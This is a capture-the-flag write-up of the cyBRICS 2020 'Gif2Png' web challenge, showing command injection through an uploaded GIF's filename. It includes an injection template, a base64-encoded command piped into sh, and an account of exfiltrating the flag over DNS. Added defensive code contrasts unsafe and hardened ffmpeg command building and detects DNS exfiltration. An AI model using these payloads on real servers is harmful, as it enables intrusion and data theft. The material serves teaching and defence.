Gif2Png is an easy web challenge from cyBRICS CTF 2020 that teaches command injection through an image's filename.
The challenge had the following description/details:
A copy of the original web application’s source code is available on: gif2png.tar.gz
The challenge web page:
It seems that the web application slices the GIF into frames and displays them on the screen:
So now let’s check the source code of the web application to understand how it is done.
This is the source code of the main file, named main.py:
What caught my attention was line 104:
This is dangerous because the web application passes user input (file.filename) into a command string that is executed by the system shell.
There is a small check that looks for certain characters in the filename and blocks the upload if it finds them:
So now we need to exploit this weak point.
The first thing we need to do is terminate the original ffmpeg command and run our own; to do this we need to escape the ' quotes and append another command.
I found a way to bypass the filename check by using a double pipe (||) to chain my command, so the malicious filename looks like this:
MALICIOUS_NAME'||MALICIOUS SYSTEM COMMAND HERE||'
There is a final problem: how do we inject system commands through the filename while still passing the filename check? Encode the payload in base64, then decode and execute it on the fly:
echo d2hvYW1pO2lkO3NsZWVwIDEw|base64 -d|sh
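To make the root cause concrete from the defender's side, here is an added example (not the challenge's main.py, whose line 104 is not reproduced) that models the two ways of handing an uploaded filename to ffmpeg. The vulnerable builder mirrors the shape the writeup describes, a filename interpolated into a shell string between single quotes, and `shell_tokens` shows how a shell would split the result. The blacklist is a constructed stand-in for the check the writeup bypasses; the hardened builder replaces it with an allow-list and an argv list for `subprocess.run`, so no shell ever parses the name. Nothing here executes ffmpeg; both builders only return the command.

```python
import re
import shlex

# Constructed deny-list for illustration only; the real check in main.py is
# not reproduced here.  Like the one the writeup bypasses, it rejects a few
# metacharacters but says nothing about quotes, pipes or spaces.
BLACKLIST = frozenset(";&$`\n")


def passes_blacklist(filename: str) -> bool:
    """Deny-list check: true when none of the listed characters occur."""
    return not any(ch in BLACKLIST for ch in filename)


def build_command_unsafe(filename: str) -> str:
    """Vulnerable shape (assumed, modelled on the writeup's description): the
    name is pasted into a shell string between single quotes, so a quote
    inside the name closes the string and whatever follows is shell syntax."""
    return f"ffmpeg -i 'uploads/{filename}' frames/%03d.png"


def shell_tokens(command: str) -> list:
    """Tokenise a command the way a POSIX shell would, returning ||, &&, ;
    and friends as separate operator tokens."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


# Allow-list: a short name of letters, digits, '-' or '_' plus a .gif suffix.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}\.gif")


def passes_allowlist(filename: str) -> bool:
    """Allow-list check: true only for names that match SAFE_NAME entirely."""
    return SAFE_NAME.fullmatch(filename) is not None


def build_command_safe(filename: str) -> list:
    """Hardened shape: refuse anything outside the allow-list, then hand
    ffmpeg an argv list (for subprocess.run) so no shell parses the name."""
    if not passes_allowlist(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return ["ffmpeg", "-i", f"uploads/{filename}", "frames/%03d.png"]


if __name__ == "__main__":
    # Constructed sample name in the shape the writeup describes; the payload
    # here is a harmless echo.
    hostile = "cat'||echo injected||'.gif"
    print("deny-list lets it through:", passes_blacklist(hostile))
    print("shell would see:", shell_tokens(build_command_unsafe(hostile)))
    print("allow-list rejects it:", not passes_allowlist(hostile))
    print("safe argv for a good name:", build_command_safe("cat.gif"))
```

The token list makes the bug visible: the shell sees `uploads/cat`, then the operator `||`, then a second command, and only then the remainder `.gif`. The deny-list is blind to this because every character it looks for is absent, which is exactly why the base64 trick works: the payload needs only letters, digits, `|`, `-` and spaces. The allow-list rejects the name outright, and the argv form means that even a name the allow-list somehow let through would reach ffmpeg as a single argument rather than as shell syntax.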
Unfortunately, the challenge server had a firewall blocking reverse shells and requests to external resources on port 80.
So I came up with the idea of exfiltrating the flag (inside main.py) through DNS using dnsbin.zhack.ca:
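DNS is the channel of choice here precisely because outbound port 53 is rarely filtered, so on the defending side the detection has to come from the resolver's query log. The added example below (not part of the writeup, and nothing in it comes from the challenge server) runs three cheap heuristics over constructed dnsmasq-style query lines: an overlong label, a hex-only label of 16 or more characters, and a long label with high character entropy. The domain `dnsbin.example`, the thresholds and the log lines are all assumptions chosen for illustration; `dnsbin.zhack.ca` is not used.

```python
import math
import re

# Constructed dnsmasq-style query log.  The last three queries carry a
# hex label, a random-looking label and an overlong label, the usual
# shapes of data leaving through DNS.  None of these lines are real.
SAMPLE_LOG = (
    "Aug 10 12:00:01 dnsmasq[1234]: query[A] www.example.org from 10.0.0.5\n"
    "Aug 10 12:00:02 dnsmasq[1234]: query[A] mail-relay-01.example.org from 10.0.0.5\n"
    "Aug 10 12:00:03 dnsmasq[1234]: query[A] 666c61677b746573747d.dnsbin.example from 10.0.0.7\n"
    "Aug 10 12:00:04 dnsmasq[1234]: query[A] q8Zk2Lm9Xp4Wc7Rt.dnsbin.example from 10.0.0.7\n"
    "Aug 10 12:00:05 dnsmasq[1234]: query[A] " + "x" * 36 + ".dnsbin.example from 10.0.0.7\n"
)

QUERY_RE = re.compile(r"query\[(?P<qtype>\w+)\] (?P<name>\S+) from (?P<src>\S+)")
HEX_RE = re.compile(r"[0-9a-fA-F]{16,}")

MAX_LABEL = 30           # DNS allows 63, but few legitimate hostnames go past 30
ENTROPY_MIN_LEN = 16     # only score entropy on labels long enough to mean something
ENTROPY_THRESHOLD = 3.5  # bits per character; illustrative, tune on your own traffic


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character in text (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def label_reasons(label: str) -> list:
    """Why one DNS label looks like encoded data, or [] if it does not."""
    reasons = []
    if len(label) > MAX_LABEL:
        reasons.append(f"label length {len(label)} > {MAX_LABEL}")
    if HEX_RE.fullmatch(label):
        reasons.append("hex-only label of 16+ chars")
    if len(label) >= ENTROPY_MIN_LEN:
        ent = shannon_entropy(label)
        if ent >= ENTROPY_THRESHOLD:
            reasons.append(f"entropy {ent:.2f} >= {ENTROPY_THRESHOLD}")
    return reasons


def analyze_log(log: str) -> list:
    """Return one dict per query that trips at least one rule."""
    findings = []
    for line in log.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue  # not a query line
        name = m.group("name").rstrip(".")
        reasons = []
        for label in name.split("."):
            reasons.extend(label_reasons(label))
        if reasons:
            findings.append({"name": name, "src": m.group("src"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit["src"], hit["name"], "->", "; ".join(hit["reasons"]))
```

Each heuristic has a blind spot on its own: a hex flag of twenty characters has low entropy, a random-looking token is short, and an attacker can split a secret over many short labels, so in practice these rules are best combined with per-source volume (many unique subdomains of one parent from one client in a short window). The entropy threshold is deliberately paired with a minimum length because short legitimate labels such as `mail-relay-01` already score above 3 bits per character.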